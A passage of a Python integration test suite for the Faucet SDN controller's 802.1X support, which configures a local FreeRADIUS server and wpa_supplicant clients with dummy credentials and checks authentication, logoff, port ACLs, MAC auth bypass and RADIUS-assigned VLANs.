interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="microphone"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="admin"
password="megaphone"
}
"""
freeradius_user_conf = """user Cleartext-Password := "microphone"
Session-timeout = {0}
admin Cleartext-Password := "megaphone"
Session-timeout = {0}
vlanuser1001 Cleartext-Password := "password"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan1"
vlanuser2222 Cleartext-Password := "milliphone"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan2"
filter_id_user_accept Cleartext-Password := "accept_pass"
Filter-Id = "accept_acl"
filter_id_user_deny Cleartext-Password := "deny_pass"
Filter-Id = "deny_acl"
"""
eapol1_host = None
eapol2_host = None
ping_host = None
nfv_host = None
nfv_intf = None
nfv_portno = None
@staticmethod
def _priv_mac(host_id):
two_byte_port_num = '%04x' % host_id
two_byte_port_num_formatted = ':'.join((two_byte_port_num[:2], two_byte_port_num[2:]))
return '00:00:00:00:%s' % two_byte_port_num_formatted
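    # Example (sketch): the host id is encoded into the last two MAC octets,
    #   _priv_mac(1)    -> '00:00:00:00:00:01'
    #   _priv_mac(258)  -> '00:00:00:00:01:02'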
def _init_faucet_config(self):
self.eapol1_host, self.eapol2_host, self.ping_host, self.nfv_host = self.hosts_name_ordered()
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(self.nfv_host)[0]
nfv_intf = [
intf for intf in last_host_switch_link if intf in switch.intfList()][0]
self.nfv_intf = str(nfv_intf)
nfv_intf = self.nfv_host.intf()
self.RADIUS_PORT = mininet_test_util.find_free_udp_port(self.ports_sock, self._test_name())
self.CONFIG = self.CONFIG.replace('NFV_INTF', str(nfv_intf))
self.CONFIG = self.CONFIG.replace('RADIUS_PORT', str(self.RADIUS_PORT))
super(Faucet8021XBaseTest, self)._init_faucet_config()
def setUp(self):
super(Faucet8021XBaseTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
self.nfv_portno = self.port_map['port_4']
self.host_drop_all_ips(self.nfv_host)
self.nfv_pids = []
tcpdump_args = '-e -n -U'
self.eapol1_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -w %s/%s-start.pcap %s ether proto 0x888e &' % (
self.tmpdir, self.eapol1_host.name, tcpdump_args), 300))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i %s-eth0 -w %s/eap-lo.pcap %s ether proto 0x888e &' % (
self.nfv_host.name, self.tmpdir, tcpdump_args), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i lo -w %s/radius.pcap %s udp port %d &' % (
self.tmpdir, tcpdump_args, self.RADIUS_PORT), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.radius_log_path = self.start_freeradius()
self.nfv_pids.append(int(self.nfv_host.lastPid))
self._enable_event_log(300)
def tearDown(self, ignore_oferrors=False):
for pid in self.nfv_pids:
self.nfv_host.cmd('kill %u' % pid)
super(Faucet8021XBaseTest, self).tearDown(ignore_oferrors=ignore_oferrors)
def post_test_checks(self):
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_dot1x_events_log()
def verify_dot1x_events_log(self):
def replace_mac(host_no):
replacement_macs = {
'HOST1_MAC': self.eapol1_host.MAC(),
'HOST2_MAC': self.eapol2_host.MAC(),
'HOST3_MAC': self.ping_host.MAC(),
'HOST4_MAC': self.nfv_host.MAC(),
}
return replacement_macs.get(host_no, None)
def insert_dynamic_values(dot1x_expected_events):
for dot1x_event in dot1x_expected_events:
top_level_key = list(dot1x_event.keys())[0]
dot1x_params = {'dp_id': int(self.dpid)}
for key, val in dot1x_event[top_level_key].items():
if key == 'port':
dot1x_params[key] = self.port_map[val]
elif key == 'eth_src':
dot1x_params[key] = replace_mac(val)
dot1x_event[top_level_key].update(dot1x_params)
if not self.DOT1X_EXPECTED_EVENTS:
return
dot1x_expected_events = copy.deepcopy(self.DOT1X_EXPECTED_EVENTS)
insert_dynamic_values(dot1x_expected_events)
with open(self.event_log, 'r') as event_file:
events_that_happened = []
for event_log_line in event_file.readlines():
if 'DOT1X' not in event_log_line:
continue
event = json.loads(event_log_line.strip())
events_that_happened.append(event['DOT1X'])
for expected_event in dot1x_expected_events:
self.assertTrue(expected_event in events_that_happened,
msg='expected event: {} not in events_that_happened {}'.format(
expected_event, events_that_happened))
def try_8021x(self, host, port_num, conf, and_logoff=False, terminate_wpasupplicant=False,
wpasup_timeout=180, tcpdump_timeout=15, tcpdump_packets=10,
expect_success=True):
if expect_success:
self.wait_8021x_flows(port_num)
port_labels = self.port_labels(port_num)
success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
tcpdump_filter = 'ether proto 0x888e'
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [
lambda: self.wpa_supplicant_callback(
host, port_num, conf, and_logoff,
timeout=wpasup_timeout,
terminate_wpasupplicant=terminate_wpasupplicant)],
timeout=tcpdump_timeout, vflags='-vvv', packets=tcpdump_packets)
if expect_success:
self.wait_for_eap_success(host, self.get_wpa_ctrl_path(host))
if not and_logoff:
self.wait_8021x_success_flows(host, port_num)
success = 'Success' in tcpdump_txt
new_success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
new_failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
new_logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
new_dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
new_dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
new_dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
if expect_success != success:
return False
if expect_success and success:
self.assertGreater(new_success_total, success_total)
self.assertGreater(new_dp_success_total, dp_success_total)
self.assertEqual(failure_total, new_failure_total)
self.assertEqual(dp_failure_total, new_dp_failure_total)
logoff = 'logoff' in tcpdump_txt
if logoff != and_logoff:
return False
if and_logoff:
self.assertGreater(new_logoff_total, logoff_total)
return True
self.assertEqual(logoff_total, new_logoff_total)
self.assertEqual(dp_logoff_total, new_dp_logoff_total)
self.assertEqual(dp_success_total, new_dp_success_total)
self.assertGreaterEqual(new_failure_total, failure_total)
self.assertGreaterEqual(new_dp_failure_total, dp_failure_total)
return False
def retry_8021x(self, host, port_num, conf, and_logoff=False, retries=2, expect_success=True):
for _ in range(retries):
if self.try_8021x(host, port_num, conf, and_logoff, expect_success=expect_success):
return True
time.sleep(1)
return False
def wait_8021x_flows(self, port_no):
port_actions = [
'SET_FIELD: {eth_dst:%s}' % self._priv_mac(port_no), 'OUTPUT:%u' % self.nfv_portno]
from_nfv_actions = [
'SET_FIELD: {eth_src:01:80:c2:00:00:03}', 'OUTPUT:%d' % port_no]
from_nfv_match = {
'in_port': self.nfv_portno, 'dl_src': self._priv_mac(port_no), 'dl_type': 0x888e}
self.wait_until_matching_flow(None, table_id=0, actions=port_actions)
self.wait_until_matching_flow(from_nfv_match, table_id=0, actions=from_nfv_actions)
def wait_8021x_success_flows(self, host, port_no):
from_host_actions = [
'GOTO_TABLE:1']
from_host_match = {
'in_port': port_no, 'dl_src': host.MAC()}
self.wait_until_matching_flow(from_host_match, table_id=0, actions=from_host_actions)
def verify_host_success(self, eapol_host, port_no, wpasupplicant_conf, and_logoff):
self.one_ipv4_ping(
eapol_host, self.ping_host.IP(), require_host_learned=False, expected_result=False)
self.assertTrue(
self.try_8021x(
eapol_host, port_no, wpasupplicant_conf, and_logoff=and_logoff))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(), require_host_learned=False, expected_result=True)
def wpa_supplicant_callback(self, host, port_num, conf, and_logoff, timeout=10, terminate_wpasupplicant=False):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
if os.path.exists(wpa_ctrl_path):
self.terminate_wpasupplicant(host)
for pid in host.cmd('lsof -t %s' % wpa_ctrl_path).splitlines():
try:
os.kill(int(pid), 15)
except (ValueError, ProcessLookupError):
pass
try:
shutil.rmtree(wpa_ctrl_path)
except FileNotFoundError:
pass
log_prefix = host.name + '_'
self.start_wpasupplicant(
host, conf, timeout=timeout,
wpa_ctrl_socket_path=wpa_ctrl_path, log_prefix=log_prefix)
if and_logoff:
self.wait_for_eap_success(host, wpa_ctrl_path)
self.wait_until_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(), require_host_learned=False)
host.cmd('wpa_cli -p %s logoff' % wpa_ctrl_path)
self.wait_until_no_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
if terminate_wpasupplicant:
self.terminate_wpasupplicant(host)
def terminate_wpasupplicant(self, host):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
host.cmd('wpa_cli -p %s terminate' % wpa_ctrl_path)
def get_wpa_ctrl_path(self, host):
wpa_ctrl_path = os.path.join(
self.tmpdir, '%s/%s-wpasupplicant' % (self.tmpdir, host.name))
return wpa_ctrl_path
@staticmethod
def get_wpa_status(host, wpa_ctrl_path):
status = host.cmdPrint('wpa_cli -p %s status' % wpa_ctrl_path)
for line in status.splitlines():
if line.startswith('EAP state'):
return line.split('=')[1].strip()
return None
def wait_for_eap_success(self, host, wpa_ctrl_path, timeout=5):
for _ in range(timeout):
eap_state = self.get_wpa_status(host, wpa_ctrl_path)
if eap_state == 'SUCCESS':
return
time.sleep(1)
self.fail('did not get EAP success: %s' % eap_state)
def wait_for_radius(self, radius_log_path):
self.wait_until_matching_lines_from_file(
r'.*Ready to process requests', radius_log_path)
def start_freeradius(self):
radius_log_path = '%s/radius.log' % self.tmpdir
listen_match = r'(listen {[^}]*(limit {[^}]*})[^}]*})|(listen {[^}]*})'
listen_config = """listen {
type = auth
ipaddr = *
port = %s
}
listen {
type = acct
ipaddr = *
port = %d
}""" % (self.RADIUS_PORT, self.RADIUS_PORT + 1)
if os.path.isfile('/etc/freeradius/users'):
# Assume we are dealing with freeradius 2 configuration
shutil.copytree('/etc/freeradius/', '%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/users' % self.tmpdir
with open('%s/freeradius/radiusd.conf' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(listen_match, '', default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.write(listen_config)
default_site.truncate()
else:
# Assume we are dealing with freeradius >=3 configuration
freerad_version = os.popen(
                r'freeradius -v | egrep -o -m 1 "Version ([0-9]\.[0-9])"').read().rstrip()
freerad_major_version = freerad_version.split(' ')[1]
shutil.copytree('/etc/freeradius/%s/' % freerad_major_version,
'%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/mods-config/files/authorize' % self.tmpdir
with open('%s/freeradius/sites-enabled/default' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(
listen_match, '', default_config)
default_config = re.sub(
r'server default {', 'server default {\n'+listen_config, default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.truncate()
with open(users_path, 'w') as users_file:
users_file.write(self.freeradius_user_conf.format(self.SESSION_TIMEOUT))
with open('%s/freeradius/clients.conf' % self.tmpdir, 'w') as clients:
clients.write("""client localhost {
ipaddr = 127.0.0.1
secret = SECRET
}""")
with open('%s/freeradius/sites-enabled/inner-tunnel' % self.tmpdir, 'r+') as innertunnel_site:
tunnel_config = innertunnel_site.read()
listen_config = """listen {
ipaddr = 127.0.0.1
port = %d
type = auth
}""" % (self.RADIUS_PORT + 2)
tunnel_config = re.sub(listen_match, listen_config, tunnel_config)
innertunnel_site.seek(0)
innertunnel_site.write(tunnel_config)
innertunnel_site.truncate()
os.system('chmod o+rx %s' % self.root_tmpdir)
os.system('chown -R root:freerad %s/freeradius/' % self.tmpdir)
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'freeradius -X -l %s -d %s/freeradius &' % (radius_log_path, self.tmpdir),
300))
self.wait_for_radius(radius_log_path)
return radius_log_path
class Faucet8021XSuccessTest(Faucet8021XBaseTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'logoff'}}]
SESSION_TIMEOUT = 3600
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.verify_host_success(
self.eapol2_host, self.port_map['port_2'], self.wpasupplicant_conf_1, True)
self.post_test_checks()
class Faucet8021XFailureTest(Faucet8021XBaseTest):
"""Failure due to incorrect identity/password"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="wrongpassword"
}
"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'failure'}}]
def test_untagged(self):
self.assertFalse(
self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.post_test_checks()
class Faucet8021XPortStatusTest(Faucet8021XBaseTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}}]
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no4 = self.port_map['port_4']
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no1)
# self.wait_until_no_matching_flow(None, table_id=0, actions=actions)
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no4)
# self.wait_until_no_matching_flow(match, table_id=0, actions=actions)
self.set_port_up(port_no4)
self.wait_8021x_flows(port_no1)
        # Check that only port 2's 802.1X rules are installed after the NFV port comes back up.
self.set_port_down(port_no1)
self.flap_port(port_no4)
self.wait_8021x_flows(port_no2)
        # (port 1 is still down, so its 802.1X flows should not be present)
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
        # When the port goes down and comes back up, the host should no longer be authenticated.
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(), require_host_learned=False)
        # Terminate the supplicant so it does not automatically reauthenticate when the port comes back up.
self.terminate_wpasupplicant(self.eapol1_host)
self.flap_port(port_no1)
self.wait_8021x_flows(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XPortFlapTest(Faucet8021XBaseTest):
def test_untagged(self):
port_no1 = self.port_map['port_1']
for _ in range(2):
self.set_port_up(port_no1)
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.set_port_down(port_no1)
self.assertFalse(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
wpa_status = self.get_wpa_status(
self.eapol1_host, self.get_wpa_ctrl_path(self.eapol1_host))
self.assertNotEqual('SUCCESS', wpa_status)
        # Kill the supplicant so it cannot reply to the identity request when the port comes up.
self.terminate_wpasupplicant(self.eapol1_host)
self.post_test_checks()
class Faucet8021XIdentityOnPortUpTest(Faucet8021XBaseTest):
def test_untagged(self):
port_no1 = self.port_map['port_1']
        # Start wpa_supplicant and log on, then send an identity request; there should then be two successes.
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False,
tcpdump_timeout=180, tcpdump_packets=6))
self.set_port_down(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
def port_up(port):
self.set_port_up(port)
self.wait_8021x_flows(port)
tcpdump_filter = 'ether proto 0x888e'
tcpdump_txt = self.tcpdump_helper(
self.eapol1_host, tcpdump_filter, [
lambda: port_up(port_no1)],
timeout=80, vflags='-vvv', packets=10)
for req_str in (
'len 5, Request (1)', # assume that this is the identity request
'Identity: user', # supplicant replies with username
'Success', # supplicant success
):
self.assertTrue(req_str in tcpdump_txt)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True, retries=10)
self.post_test_checks()
class Faucet8021XPeriodicReauthTest(Faucet8021XBaseTest):
SESSION_TIMEOUT = 15
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_labels1 = self.port_labels(port_no1)
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
last_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
for _ in range(4):
for _ in range(self.SESSION_TIMEOUT * 2):
total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
if total > last_total:
break
time.sleep(1)
self.assertGreater(total, last_total, msg='failed to successfully re-auth')
last_total = total
self.post_test_checks()
class Faucet8021XConfigReloadTest(Faucet8021XBaseTest):
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.wait_8021x_flows(port_no1)
self.wait_8021x_flows(port_no2)
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][port_no1]['dot1x'] = False
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_8021x_flows(port_no2)
self.post_test_checks()
class Faucet8021XCustomACLLoginTest(Faucet8021XBaseTest):
"""Ensure that 8021X Port ACLs Work before and after Login"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
auth_acl:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
noauth_acl:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
auth_acl: auth_acl
noauth_acl: noauth_acl
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.post_test_checks()
class Faucet8021XCustomACLLogoutTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
def test_untagged(self):
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XMABTest(Faucet8021XSuccessTest):
"""Ensure that 802.1x Port Supports Mac Auth Bypass."""
DOT1X_EXPECTED_EVENTS = [{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC',
'status': 'success'}},
]
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_mab: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
def start_freeradius(self):
# Add the host mac address to the FreeRADIUS config
self.freeradius_user_conf += '\n{0} Cleartext-Password := "{0}"'.format(
str(self.eapol1_host.MAC()).replace(':', '')
)
return super(Faucet8021XMABTest, self).start_freeradius()
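    # Resulting extra FreeRADIUS users line (sketch) for a hypothetical host MAC
    # 00:11:22:33:44:55:
    #   001122334455 Cleartext-Password := "001122334455"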
@staticmethod
def dhclient_callback(host, timeout):
dhclient_cmd = 'dhclient -d -1 %s' % host.defaultIntf()
return host.cmd(mininet_test_util.timeout_cmd(dhclient_cmd, timeout), verbose=True)
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.dhclient_callback(self.eapol1_host, 10)
self.wait_until_matching_lines_from_file(r'.*AAA_SUCCESS.*', self.env['faucet']['FAUCET_LOG'])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertEqual(
1,
self.scrape_prometheus_var('port_dot1x_success_total', labels=self.port_labels(port_no1), default=0))
self.post_test_checks()
class Faucet8021XDynACLLoginTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
]
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_accept"
password="accept_pass"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_deny"
password="deny_pass"
}
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
accept_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
deny_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_dyn_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_dyn_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XDynACLLogoutTest(Faucet8021XDynACLLoginTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'logoff'}}
]
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XVLANTest(Faucet8021XSuccessTest):
"""Test that two hosts are put into vlans.
Same VLAN, Logoff, diff VLANs, port flap."""
CONFIG_GLOBAL = """vlans:
100:
vid: 100
description: "untagged"
radiusassignedvlan1:
vid: %u
description: "untagged"
dot1x_assigned: True
radiusassignedvlan2:
vid: %u
description: "untagged"
dot1x_assigned: True
""" % (mininet_test_base.MAX_TEST_VID - 1,
mininet_test_base.MAX_TEST_VID)
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: radiusassignedvlan1
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
RADIUS_PORT = 1940
DOT1X_EXPECTED_EVENTS = []
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser1001"
password="password"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser2222"
password="milliphone"
}
"""
def test_untagged(self):
vid = 100 ^ mininet_test_base.OFPVID_PRESENT
radius_vid1 = (mininet_test_base.MAX_TEST_VID - 1) ^ mininet_test_base.OFPVID_PRESENT
radius_vid2 = mininet_test_base.MAX_TEST_VID ^ mininet_test_base.OFPVID_PRESENT
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no3 = self.port_map['port_3']
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
